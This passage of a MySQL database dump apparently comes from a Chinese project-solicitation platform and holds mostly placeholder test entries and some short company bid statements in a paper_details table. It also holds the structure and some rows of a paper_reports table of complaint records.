手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀啊手动阀',118,'2019-11-21 11:10:58','2019-11-21 11:10:58'),(118,'方法士大夫',119,'2019-11-21 12:24:05','2019-11-21 12:24:05'),(119,'士大夫',120,'2019-11-21 12:24:40','2019-11-21 12:24:40'),(120,'阿斯顿发射点',121,'2019-11-21 15:03:02','2019-11-21 15:03:02'),(121,'安抚大使的',122,'2019-11-21 15:03:16','2019-11-21 15:03:16'),(122,'水电费稍等| | |\r\n| ----水电费-------- | ------a\'s阿萨德\'d------ |\r\n| | 水电费|\r\n| | |\r\n',123,'2019-11-21 15:58:52','2019-11-21 15:58:52'),(123,'水电费',124,'2019-11-21 16:01:08','2019-11-21 16:01:08'),(124,'阿斯顿发斯蒂芬',125,'2019-11-21 16:01:46','2019-11-21 16:01:46'),(125,'阿斯蒂芬',126,'2019-11-21 16:05:01','2019-11-21 16:05:01'),(126,'我们公司有数据采集方面的丰富经验,可以承担该任务。',127,'2019-12-30 10:07:20','2019-12-30 10:07:20'),(127,'我公司给滴滴公司开发过汽车定位系统,有丰富的GPS定位开发经验,可以承担该任务。',128,'2019-12-30 10:16:20','2019-12-30 10:16:20'),(128,'我们团队有前高德地图核心研发人员,多次成果案例',129,'2019-12-30 15:01:49','2019-12-30 15:01:49'),(129,'我们团队有实力,可以的。',130,'2019-12-30 15:09:41','2019-12-30 15:09:41'),(130,'我们公司在人工智能领域有者丰富的开发经验,尤其在人脸识别系统处在同行业领先位置。',131,'2019-12-30 15:38:01','2019-12-30 15:38:01'),(131,'我们公司开发过类似产品,有现成的产品可用,请选择我们。',132,'2019-12-30 15:39:39','2019-12-30 15:39:39'),(132,'我no1',133,'2020-03-23 10:20:39','2020-03-23 10:20:39'),(133,'zzzzz',134,'2020-03-23 10:22:39','2020-03-23 10:22:39'),(134,'xcvbxcvb',135,'2020-03-23 10:23:53','2020-03-23 10:23:53'),(135,'传达一号文件的测试完成',136,'2020-03-23 14:51:58','2020-03-23 14:51:58'),(136,'卡萨丁的第一次应征,我们很有经验',137,'2020-03-23 14:58:18','2020-03-23 14:58:18'),(137,'终于有机会展示一把了,呵呵',138,'2020-03-23 15:05:21','2020-03-23 15:05:21'),(138,'啊啊',139,'2020-03-23 15:10:39','2020-03-23 15:10:39'),(139,'1111',140,'2020-03-23 15:15:49','2020-03-23 15:15:49'),(140,'你们的稿件是否雷同?',141,'2020-03-23 15:25:33','2020-03-23 15:25:33'),(141,'啊的说法',142,'2020-03-24 08:23:27','2020-03-24 08:23:27'),(142,'阿斯蒂芬',143,'2020-03-24 08:24:17','2020-03-24 08:24:17'),(143,'1111',144,'2020-03-24 08:48:58','2020-03-24 08:48:58'),(144,'三生三世',145,'2020-03-24 08:50:10','2020-03-24 08:50:10'),(145,'阿萨德',146,'2020-03-24 08:50:57','2020-03-24 08:50:57'),(146,'好不好',147,'2020-03-24 08:55:29','2020-03-24 08:55:29'),(147,'更好',148,'2020-03-24 08:56:01','2020-03-24 08:56:01'),(148,'8999',149,'2020-03-24 08:57:03','2020-03-24 08:57:03'),(149,'噢噢看看',150,'2020-03-24 08:57:42','2020-03-24 08:57:42'),(150,'恢复想象力',151,'2020-03-24 08:58:53','2020-03-24 08:58:53'),(151,'我们也想参与',152,'2020-03-24 08:59:58','2020-03-24 08:59:58'),(152,'方法最重要还是技术呢',153,'2020-03-24 09:01:05','2020-03-24 09:01:05'),(153,'试试',154,'2020-03-24 09:02:17','2020-03-24 09:02:17'),(154,'发发火',155,'2020-03-24 09:02:58','2020-03-24 09:02:58'),(155,'f 水电费',156,'2020-03-24 09:03:26','2020-03-24 09:03:26'),(156,'大风刮过',157,'2020-03-24 09:04:11','2020-03-24 09:04:11'),(157,'水电费',158,'2020-03-24 09:04:41','2020-03-24 09:04:41'),(158,'法国恢复',159,'2020-03-24 09:05:20','2020-03-24 09:05:20'),(159,'啊飒飒水电费',160,'2020-03-24 09:09:38','2020-03-24 09:09:38'),(160,'啊',161,'2020-03-24 17:14:19','2020-03-24 17:14:19'),(161,'阿斯蒂芬',162,'2020-03-25 15:52:36','2020-03-25 15:52:36'),(162,'AA',163,'2020-03-27 15:34:35','2020-03-27 15:34:35'),(163,'啊实打实',164,'2020-03-27 15:35:25','2020-03-27 15:35:25'),(164,'1111',165,'2020-04-02 15:45:16','2020-04-02 15:45:16'),(165,'我们在测试',166,'2020-04-09 09:10:13','2020-04-09 09:10:13'),(166,'我们在进行测试2020年04月09上午9:17',167,'2020-04-09 09:17:55','2020-04-09 09:17:55'),(167,'我们公司一直从事基于Java的软件开发,目前基于Springboot框架也有现成的成果。附件是我们开发的一个购物网站的实例。',168,'2020-10-15 10:26:59','2020-10-15 10:26:59'),(168,'我们公司以前已经开发过单机版的专家评审系统,只要移植到网络平台上就可以了。',169,'2020-10-15 10:32:36','2020-10-15 10:32:36'),(169,'我们公司开发过户籍在线申报系统,对在线系统开发有丰富的经验。',170,'2020-10-15 10:42:04','2020-10-15 10:42:04'),(170,'我公司现有前端界面设计人员,设计过很多Logo。',171,'2020-10-15 11:00:22','2020-10-15 11:00:22'),(171,'我公司参与过北京奥运会徽标的logo征集,有丰富的经验。',172,'2020-10-15 11:03:54','2020-10-15 11:03:54'),(172,'我们有经验,做过类似项目。',173,'2020-10-16 08:03:58','2020-10-16 08:03:58'),(173,'我们公司以前开发过数据分析方面的软件。',174,'2020-10-16 08:05:10','2020-10-16 08:05:10'),(174,'我们公司有经验,做过类似产品。',175,'2020-10-16 08:49:40','2020-10-16 08:49:40'),(175,'我们成功开发过LTE系统,没有问题。',176,'2020-10-16 08:50:27','2020-10-16 08:50:27'),(176,'我们公司在数据采集和处理方面,具有丰富的经验,为国家开发过大气质量在线采集系统。',177,'2020-10-16 12:27:10','2020-10-16 12:27:10'),(177,'我们公司可以,我们无论是在大数据存储还是数据挖掘方面都走在行业的前面。',178,'2020-10-16 12:33:15','2020-10-16 12:33:15'),(178,'我们应征',179,'2020-12-01 11:16:03','2020-12-01 11:16:03'),(179,'啊书法大赛',180,'2021-02-23 14:45:26','2021-02-23 14:45:26'),(180,'asdfasdf',181,'2021-02-23 14:45:59','2021-02-23 14:45:59'),(181,'阿斯顿发射点',182,'2021-02-23 16:36:00','2021-02-23 16:36:00');
|
||
/*!40000 ALTER TABLE `paper_details` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `paper_reports`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `paper_reports`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `paper_reports` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`content` varchar(255) NOT NULL,
|
||
`paper_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`status` int(11) NOT NULL DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `paper_reports`
|
||
--
|
||
|
||
LOCK TABLES `paper_reports` WRITE;
|
||
/*!40000 ALTER TABLE `paper_reports` DISABLE KEYS */;
|
||
INSERT INTO `paper_reports` VALUES (1,'假的',36,20,'2019-08-23 12:58:12','2019-08-23 15:11:05',1),(2,'发送到',74,49,'2019-10-29 08:51:46','2019-10-29 09:30:23',1),(5,'假的\n',135,49,'2020-03-23 10:42:39','2020-03-23 10:42:54',1),(6,'发送到 ',135,49,'2020-03-23 10:43:18','2020-03-23 10:43:34',2),(7,'方法阿斯顿发',134,49,'2020-03-23 10:56:47','2020-03-23 10:57:16',1),(8,'阿斯顿发阿斯顿',134,49,'2020-03-23 10:57:44','2020-03-23 10:59:03',1),(9,'啊啊啊',137,46,'2020-03-23 15:19:47','2020-03-23 15:21:02',2),(10,'asd',133,73,'2020-03-23 15:25:04','2020-03-23 15:25:04',0),(11,'十点多',135,49,'2020-03-23 15:25:44','2020-03-23 15:39:28',1),(12,'他们的稿件与我们以前做过的一个项目雷同',139,65,'2020-03-23 15:26:07','2020-03-23 15:29:27',2),(13,'具体原因是我们公司决定再看看',139,65,'2020-03-23 15:32:48','2020-03-23 15:38:59',1),(14,'发多少',142,1,'2020-03-24 08:23:35','2020-03-24 08:23:35',0),(15,'111',142,73,'2020-03-24 08:25:21','2020-03-24 08:25:40',1),(16,'aaa',134,49,'2020-03-24 08:30:13','2020-03-24 